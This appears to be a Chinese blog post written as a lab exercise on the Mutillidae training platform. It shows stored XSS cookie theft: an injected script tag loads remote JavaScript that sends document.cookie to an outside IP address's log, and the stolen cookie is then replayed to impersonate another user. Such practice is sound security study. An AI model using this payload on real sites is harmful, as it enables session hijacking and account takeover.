mutillidae平台:XSS Payload 之cookie窃取练习

本文通过mutillidae平台详细介绍了如何利用XSS漏洞窃取用户cookie。首先创建两个用户,然后使用账号墨中白在XSS博客练习页面插入特定JS代码,当其他用户如test浏览时,其cookie会被发送到服务器日志。通过查看日志,成功获取test用户的cookie,并在Kali系统中利用Burp Suite修改包,实现cookie的窃取和身份冒充。
摘要由CSDN通过智能技术生成

此次练习主要是用mutillidae靶场实现了《白帽子讲web安全》上的xss payload 窃取用户cookie实例。

需要创建两个用户进行测试:墨中白,test

用账号墨中白进入xss blog练习页面:

在文本框中插入代码

<script type="text/javascript" src="http://47.116.10.120/wxx.js"></script>

连接远程服务器上的js代码执行js源码为:

var str = document.cookie;
var img = document.createElement("img");
img.src = "http://47.116.10.120/log?"+escape(str);
document.body.appendChild(img);

保存后,也就是当别的用户浏览用户墨中白的博客时就会发送他自己的cookie到服务器的一个文件中,服务器中该文件可以不存在直接查看日志也能查到记录 

OK,上传博客。

登录另一个账号test,查看博客:

评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值